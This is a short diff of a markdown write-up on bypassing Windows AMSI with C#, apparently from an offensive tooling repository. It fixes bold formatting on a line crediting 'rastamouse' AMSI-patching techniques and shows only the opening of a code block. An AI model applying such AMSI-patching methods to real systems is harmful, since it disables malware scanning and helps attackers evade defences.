NyaMeeEain/Create_Custom_Cshare/AMSI_Bypassing_With C#.md

 because We can write our own interpreter to execucate any OS Command without having powershell.exe.

-**This AMSI Patching Techniquie is heavy reliance on rastamouse Techniques.
+**This AMSI Patching Techniquie is heavy reliance on rastamouse Techniques**
 ```
 using System;
 using System.Runtime.InteropServices;